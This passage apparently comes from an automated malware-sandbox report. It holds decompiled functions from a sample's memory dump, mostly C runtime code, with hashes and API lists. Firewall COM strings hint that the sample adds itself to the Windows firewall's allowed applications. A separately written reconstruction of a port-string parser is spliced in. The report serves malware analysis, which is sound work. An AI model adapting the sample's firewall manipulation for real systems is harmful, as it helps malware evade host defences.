                                                                                                                                                • Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: String$ByteCharConvertErrorFromLastMultiProgWide_com_util::$AllocCreateInitializeInstanceUninitialize__wcstoui64lstrlen
                                                                                                                                                • String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
                                                                                                                                                • API String ID: 1827900861-1951265404
                                                                                                                                                • Opcode ID: dd73e4129b9bb67cb5c225bdf3eecd6764f3537e44c7167e638fb0ba2dfc4bf8
                                                                                                                                                • Instruction ID: 693d56c5816401732ef4bf25e7746d6c38af88ff230b868b6039b62de657330f
                                                                                                                                                • Opcode Fuzzy Hash: dd73e4129b9bb67cb5c225bdf3eecd6764f3537e44c7167e638fb0ba2dfc4bf8
                                                                                                                                                • Instruction Fuzzy Hash: 5541CBB5A0020D9FCB00EFE8C888CAEBBF9EF8D710B244895E605E7251DB759D45CB64
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                			E00BF28F4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                				signed int _t15;
                                                                                                                                                				LONG* _t21;
                                                                                                                                                				long _t23;
                                                                                                                                                				void* _t29;
                                                                                                                                                				void* _t31;
                                                                                                                                                				LONG* _t33;
                                                                                                                                                				void* _t34;
                                                                                                                                                				void* _t35;
                                                                                                                                                
                                                                                                                                                				_t35 = __eflags;
                                                                                                                                                				_t29 = __edx;
                                                                                                                                                				_t25 = __ebx;
                                                                                                                                                				_push(0xc);
                                                                                                                                                				_push(0xbfdcb8);
                                                                                                                                                				E00BF3F70(__ebx, __edi, __esi);
                                                                                                                                                				_t31 = E00BF339D(__ebx, __edi, _t35);
                                                                                                                                                				_t15 =  *0xbff534; // 0xfffffffe
                                                                                                                                                				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                                                                					E00BF3C3D(_t25, 0xd);
                                                                                                                                                					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                                                                					_t33 =  *(_t31 + 0x68);
                                                                                                                                                					 *(_t34 - 0x1c) = _t33;
                                                                                                                                                					__eflags = _t33 -  *0xbff438; // 0x2931658
                                                                                                                                                					if(__eflags != 0) {
                                                                                                                                                						__eflags = _t33;
                                                                                                                                                						if(_t33 != 0) {
                                                                                                                                                							_t23 = InterlockedDecrement(_t33);
                                                                                                                                                							__eflags = _t23;
                                                                                                                                                							if(_t23 == 0) {
                                                                                                                                                								__eflags = _t33 - 0xbff010;
                                                                                                                                                								if(__eflags != 0) {
                                                                                                                                                									_push(_t33);
                                                                                                                                                									E00BF54A0(_t25, _t29, _t31, _t33, __eflags);
                                                                                                                                                								}
                                                                                                                                                							}
                                                                                                                                                						}
                                                                                                                                                						_t21 =  *0xbff438; // 0x2931658
                                                                                                                                                						 *(_t31 + 0x68) = _t21;
                                                                                                                                                						_t33 =  *0xbff438; // 0x2931658
                                                                                                                                                						 *(_t34 - 0x1c) = _t33;
                                                                                                                                                						InterlockedIncrement(_t33);
                                                                                                                                                					}
                                                                                                                                                					 *(_t34 - 4) = 0xfffffffe;
                                                                                                                                                					E00BF298F();
                                                                                                                                                				} else {
                                                                                                                                                					_t33 =  *(_t31 + 0x68);
                                                                                                                                                				}
                                                                                                                                                				if(_t33 == 0) {
                                                                                                                                                					E00BF2033(_t29, _t31, 0x20);
                                                                                                                                                				}
                                                                                                                                                				return E00BF3FB5(_t33);
			}
                                                                                                                                                0x00bf2978
                                                                                                                                                0x00bf297e
                                                                                                                                                0x00bf2985
                                                                                                                                                0x00bf2917
                                                                                                                                                0x00bf2917
                                                                                                                                                0x00bf2917
                                                                                                                                                0x00bf291c
                                                                                                                                                0x00bf2920
                                                                                                                                                0x00bf2925
                                                                                                                                                0x00bf292d

APIs
• __getptd.LIBCMT ref: 00BF2900
  • Part of subcall function 00BF339D: __getptd_noexit.LIBCMT ref: 00BF33A0
  • Part of subcall function 00BF339D: __amsg_exit.LIBCMT ref: 00BF33AD
• __amsg_exit.LIBCMT ref: 00BF2920
• __lock.LIBCMT ref: 00BF2930
• InterlockedDecrement.KERNEL32(?), ref: 00BF294D
• InterlockedIncrement.KERNEL32(02931658), ref: 00BF2978
Memory Dump Source
• Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp
Similarity
• API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
• String ID:
• API String ID: 4271482742-0
• Opcode ID: 7f257acc847d134b9940395161b10b9826a1badc16a2284cfd1779e3fed96fb1
• Instruction ID: 377207f684dc4061b3fe5557ce77b656e6318d371e307ca06c5ac3be718d3221
• Opcode Fuzzy Hash: 7f257acc847d134b9940395161b10b9826a1badc16a2284cfd1779e3fed96fb1
• Instruction Fuzzy Hash: A001C032D0161E9BC721AF68954577EB7E0FF00B60F0040A5E614B7294CFB86E9ACBD5
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 41%
E00BF54A0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
	intOrPtr* _t10;
	intOrPtr _t13;
	intOrPtr _t24;
	void* _t26;

	_push(0xc);
	_push(0xbfde48);
	_t8 = E00BF3F70(__ebx, __edi, __esi);
	_t24 =  *((intOrPtr*)(_t26 + 8));
	if(_t24 == 0) {
		L9:
		return E00BF3FB5(_t8);
	}
	if( *0xc00a98 != 3) {
		_push(_t24);
		L7:
		_t8 = HeapFree( *0xc0093c, 0, ??);
		_t32 = _t8;
		if(_t8 == 0) {
			_t10 = E00BF38CA(_t32);
			 *_t10 = E00BF3888(GetLastError());
		}
		goto L9;
	}
	E00BF3C3D(__ebx, 4);
	 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
	_t13 = E00BF6520(_t24);
	 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
	if(_t13 != 0) {
		_push(_t24);
		_push(_t13);
		E00BF6550();
	}
	 *(_t26 - 4) = 0xfffffffe;
	_t8 = E00BF54F6();
	if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
		goto L9;
	} else {
		_push( *((intOrPtr*)(_t26 + 8)));
		goto L7;
	}
}


APIs
• __lock.LIBCMT ref: 00BF54BE
  • Part of subcall function 00BF3C3D: __mtinitlocknum.LIBCMT ref: 00BF3C53
  • Part of subcall function 00BF3C3D: __amsg_exit.LIBCMT ref: 00BF3C5F
  • Part of subcall function 00BF3C3D: EnterCriticalSection.KERNEL32(?,?,?,00BF754D,00000004,00BFDEC8,0000000C,00BF5589,00000000,?,00000000,00000000,00000000,?,00BF334F,00000001), ref: 00BF3C67
• ___sbh_find_block.LIBCMT ref: 00BF54C9
• ___sbh_free_block.LIBCMT ref: 00BF54D8
• HeapFree.KERNEL32(00000000,00000000,00BFDE48,0000000C,00BF3C1E,00000000,00BFDD68,0000000C,00BF3C58,00000000,?,?,00BF754D,00000004,00BFDEC8,0000000C), ref: 00BF5508
• GetLastError.KERNEL32(?,00BF754D,00000004,00BFDEC8,0000000C,00BF5589,00000000,?,00000000,00000000,00000000,?,00BF334F,00000001,00000214), ref: 00BF5519
Memory Dump Source
• Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp
Similarity
• API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
• String ID:
• API String ID: 2714421763-0
• Opcode ID: ddd96bd689ac1dd5362ddec53af5d1af993a5e8cdc2880a1d0212c300eec9793
• Instruction ID: 020ee481a744e22f8351e5f292aefc313cc7a7ccc3c04e59f9e6372474b07c35
• Opcode Fuzzy Hash: ddd96bd689ac1dd5362ddec53af5d1af993a5e8cdc2880a1d0212c300eec9793
• Instruction Fuzzy Hash: E0014F7190170EAADB306BB49C0A77E7AE5DF10761F254089F704AB195DE388A8C8B95
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00BF1071(void* __edi, intOrPtr* __esi, intOrPtr* _a4) {
	signed int _v8;
	intOrPtr _t11;
	void* _t25;

	_t25 = __edi;
	if(E00BF1C70(__edi, "udp") == 0) {
		if(E00BF1C70(__edi, "tcp") == 0) {
			if(E00BF1C70(__edi, "any") == 0) {
				goto L9;
			} else {
				 *__esi = 0x100;
				goto L6;
			}
		} else {
			 *__esi = 6;
			goto L6;
		}
	} else {
		 *__esi = 0x11;
		L6:
		if(E00BF1C70(_t25, ":") == 0) {
			L9:
			return 0;
		} else {
			_v8 = _v8 & 0x00000000;
			_t11 = E00BF1FD7(_t9 + 1,  &_v8, 0xa);
			if(_t11 == 0) {
				goto L9;
			} else {
				 *_a4 = _t11;
				return 1;
			}
		}
	}
}

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: __wcstoui64
                                                                                                                                                • String ID: any$tcp$udp
                                                                                                                                                • API String ID: 3882282163-1470427579
                                                                                                                                                • Opcode ID: dd217fa96ce737ec27b6730317dd75762e12e4a7aa65c9e6838d23ba6b771f6e
                                                                                                                                                • Instruction ID: 6d166fa4ad4b2d5657c7fad0001ce0405426ac02f3ba6cdbd5651d2b6d7df68d
                                                                                                                                                • Opcode Fuzzy Hash: dd217fa96ce737ec27b6730317dd75762e12e4a7aa65c9e6838d23ba6b771f6e
                                                                                                                                                • Instruction Fuzzy Hash: 4E01217264834EE5E714AA389D02B3662D9CB02764F200D9DEB41DB0D1EFB6D8C89629
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%
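Added example, not code from the sandbox report or from the sample: a C reconstruction of the "proto:port" parse in the fragment above, to make the decompiled logic legible. The fragment itself shows only the else branch storing 0x11 (IPPROTO_UDP), the search for ':', the base-10 conversion of the remainder (the 0xa argument) and the rule that a zero result is failure. The keyword table (any/tcp/udp, taken from the String ID block), the values assumed for tcp (IPPROTO_TCP, 6) and any (0), and the use of narrow strings instead of the wide strings the __wcstoui64 API ID suggests are all assumptions. The range and trailing-garbage checks are additions the original does not perform.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* IPPROTO_* numbers. The decompiled fragment writes 0x11 (IPPROTO_UDP);
 * the tcp and any values are assumptions, not taken from the sample. */
#define PROTO_ANY 0
#define PROTO_TCP 6
#define PROTO_UDP 17

/* Map the keyword before the colon to a protocol number; -1 if unknown.
 * Keyword list assumed from the report's "any$tcp$udp" string block. */
static int proto_from_keyword(const char *s, size_t n)
{
    if (n == 3 && strncmp(s, "any", 3) == 0) return PROTO_ANY;
    if (n == 3 && strncmp(s, "tcp", 3) == 0) return PROTO_TCP;
    if (n == 3 && strncmp(s, "udp", 3) == 0) return PROTO_UDP;
    return -1;
}

/* Parse "<proto>:<port>" the way the fragment does: find ':', convert the
 * text after it in base 10, treat a zero result as failure. Returns 1 and
 * fills *proto/*port on success, 0 on failure. */
int parse_proto_port(const char *spec, int *proto, unsigned long *port)
{
    const char *colon = strchr(spec, ':');
    if (colon == NULL) return 0;               /* no ':' -> return 0 */

    int p = proto_from_keyword(spec, (size_t)(colon - spec));
    if (p < 0) return 0;

    char *end = NULL;
    errno = 0;
    unsigned long v = strtoul(colon + 1, &end, 10);
    if (v == 0) return 0;                      /* the original's only check */

    /* Added hardening: strtoul accepts a leading sign and stops at the first
     * non-digit, so "tcp:-1" and "tcp:80abc" would otherwise pass. */
    if (errno == ERANGE || *end != '\0' || v > 65535) return 0;

    *proto = p;
    *port = v;
    return 1;
}

/* Helper so results can be checked as return values. */
int check(const char *spec, int want_proto, unsigned long want_port)
{
    int p = -1;
    unsigned long port = 0;
    if (!parse_proto_port(spec, &p, &port)) return 0;
    return p == want_proto && port == want_port;
}

int main(void)
{
    const char *samples[] = { "udp:53", "tcp:443", "any:8080",
                              "tcp443", "tcp:0", "tcp:-1", "icmp:1" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int p = -1;
        unsigned long port = 0;
        int ok = parse_proto_port(samples[i], &p, &port);
        printf("%-10s -> %s proto=%d port=%lu\n", samples[i],
               ok ? "ok  " : "fail", p, port);
    }
    return 0;
}
```

The one-check-only behaviour of the original (a zero result means failure, anything else is stored) is worth keeping in mind when reading the surrounding code: a port of 0 is never accepted, and without the extra checks a negative or oversized number would be written through the output pointer unchanged.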

                                                                                                                                                C-Code - Quality: 65%
                                                                                                                                                			E00BF9110() {
                                                                                                                                                				signed long long _v12;
                                                                                                                                                				signed int _v20;
                                                                                                                                                				signed long long _v28;
                                                                                                                                                				signed char _t8;
                                                                                                                                                
                                                                                                                                                				_t8 = GetModuleHandleA("KERNEL32");
                                                                                                                                                				if(_t8 == 0) {
                                                                                                                                                					L6:
                                                                                                                                                					_v20 =  *0xbfd320;
                                                                                                                                                					_v28 =  *0xbfd318;
                                                                                                                                                					asm("fsubr qword [ebp-0x18]");
                                                                                                                                                					_v12 = _v28 / _v20 * _v20;
                                                                                                                                                					asm("fld1");
                                                                                                                                                					asm("fcomp qword [ebp-0x8]");
                                                                                                                                                					asm("fnstsw ax");
                                                                                                                                                					if((_t8 & 0x00000005) != 0) {
                                                                                                                                                						return 0;
                                                                                                                                                					} else {
                                                                                                                                                						return 1;
                                                                                                                                                					}
                                                                                                                                                				} else {
                                                                                                                                                					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                                                                                                					if(__eax == 0) {
                                                                                                                                                						goto L6;
                                                                                                                                                					} else {
                                                                                                                                                						_push(0);
                                                                                                                                                						return __eax;
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                			}

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32,00BF84A4), ref: 00BF9115
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00BF9125
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                • API String ID: 1646373207-3105848591
                                                                                                                                                • Opcode ID: 6f2bf5da45ab28bd8cf5e455b0113c5c6ab541350d92815fa03b746209893baa
                                                                                                                                                • Instruction ID: d36629f0165a3cf56a5ea71a092588f1268532ab3ac9db3c5fffe2f182eff36e
                                                                                                                                                • Opcode Fuzzy Hash: 6f2bf5da45ab28bd8cf5e455b0113c5c6ab541350d92815fa03b746209893baa
                                                                                                                                                • Instruction Fuzzy Hash: 55F01D20A00A0EE2DB101BB5AD0E67EBAB9EB80746F8205D09391F20D4DE7081B9D246
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00BF8FFC(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                                				intOrPtr _t25;
                                                                                                                                                				void* _t26;
                                                                                                                                                				void* _t28;
                                                                                                                                                
                                                                                                                                                				_t25 = _a16;
                                                                                                                                                				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                                                                                					_t26 = E00BF88ED(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                					goto L9;
                                                                                                                                                				} else {
                                                                                                                                                					_t34 = _t25 - 0x66;
                                                                                                                                                					if(_t25 != 0x66) {
                                                                                                                                                						__eflags = _t25 - 0x61;
                                                                                                                                                						if(_t25 == 0x61) {
                                                                                                                                                							L7:
                                                                                                                                                							_t26 = E00BF89DD(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                						} else {
                                                                                                                                                							__eflags = _t25 - 0x41;
                                                                                                                                                							if(__eflags == 0) {
                                                                                                                                                								goto L7;
                                                                                                                                                							} else {
                                                                                                                                                								_t26 = E00BF8F02(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                							}
                                                                                                                                                						}
                                                                                                                                                						L9:
                                                                                                                                                						return _t26;
                                                                                                                                                					} else {
                                                                                                                                                						return E00BF8E47(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                			}

APIs
Memory Dump Source
• Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
• Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
• Instruction ID: 4b33e7abf9f6fa1aeb2f99c958768662fcee57d6c8353dff42dcbaaa31e74cb1
• Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
• Instruction Fuzzy Hash: A111423200014EBBCF165E95CC41DEE3FA7FB18350B588495FB1856031CB36C975AB81
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 90%
E00BF3060(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
	signed int _t13;
	void* _t25;
	intOrPtr _t28;
	void* _t29;
	void* _t30;

	_t30 = __eflags;
	_t26 = __edi;
	_t25 = __edx;
	_t22 = __ebx;
	_push(0xc);
	_push(0xbfdcf8);
	E00BF3F70(__ebx, __edi, __esi);
	_t28 = E00BF339D(__ebx, __edi, _t30);
	_t13 =  *0xbff534; // 0xfffffffe
	if(( *(_t28 + 0x70) & _t13) == 0) {
		L6:
		E00BF3C3D(_t22, 0xc);
		 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
		_t8 = _t28 + 0x6c; // 0x6c
		_t26 =  *0xbff618; // 0xbff540
		 *((intOrPtr*)(_t29 - 0x1c)) = E00BF3022(_t8, _t25, _t26);
		 *(_t29 - 4) = 0xfffffffe;
		E00BF30CA();
	} else {
		_t32 =  *((intOrPtr*)(_t28 + 0x6c));
		if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
			goto L6;
		} else {
			_t28 =  *((intOrPtr*)(E00BF339D(_t22, _t26, _t32) + 0x6c));
		}
	}
	if(_t28 == 0) {
		E00BF2033(_t25, _t26, 0x20);
	}
	return E00BF3FB5(_t28);
}


APIs
• __getptd.LIBCMT ref: 00BF306C
  • Part of subcall function 00BF339D: __getptd_noexit.LIBCMT ref: 00BF33A0
  • Part of subcall function 00BF339D: __amsg_exit.LIBCMT ref: 00BF33AD
• __getptd.LIBCMT ref: 00BF3083
• __amsg_exit.LIBCMT ref: 00BF3091
• __lock.LIBCMT ref: 00BF30A1
Memory Dump Source
• Source File: 0000001D.00000002.368285255.0000000000BF1000.00000020.00020000.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000001D.00000002.368276429.0000000000BF0000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368300515.0000000000BFC000.00000002.00020000.sdmp
• Associated: 0000001D.00000002.368320254.0000000000BFF000.00000004.00020000.sdmp
• Associated: 0000001D.00000002.368331470.0000000000C01000.00000002.00020000.sdmp
Similarity
• API ID: __amsg_exit__getptd$__getptd_noexit__lock
• String ID:
• API String ID: 3521780317-0
• Opcode ID: d1197ead1fcd3bbaeb22f144ea0585a70901e82bb6b3291a9767db7c8d4ecbba
• Instruction ID: 8e3d63613ef85d9440220df550cb064ef05de61be3493edf3b6821b28ddbf4f0
• Opcode Fuzzy Hash: d1197ead1fcd3bbaeb22f144ea0585a70901e82bb6b3291a9767db7c8d4ecbba
• Instruction Fuzzy Hash: 3EF01D3294170D9AD720EB74944A77D73E0AF00F11F1045DAE6A4972D2CF749B49CAA5
Uniqueness

Uniqueness Score: -1.00%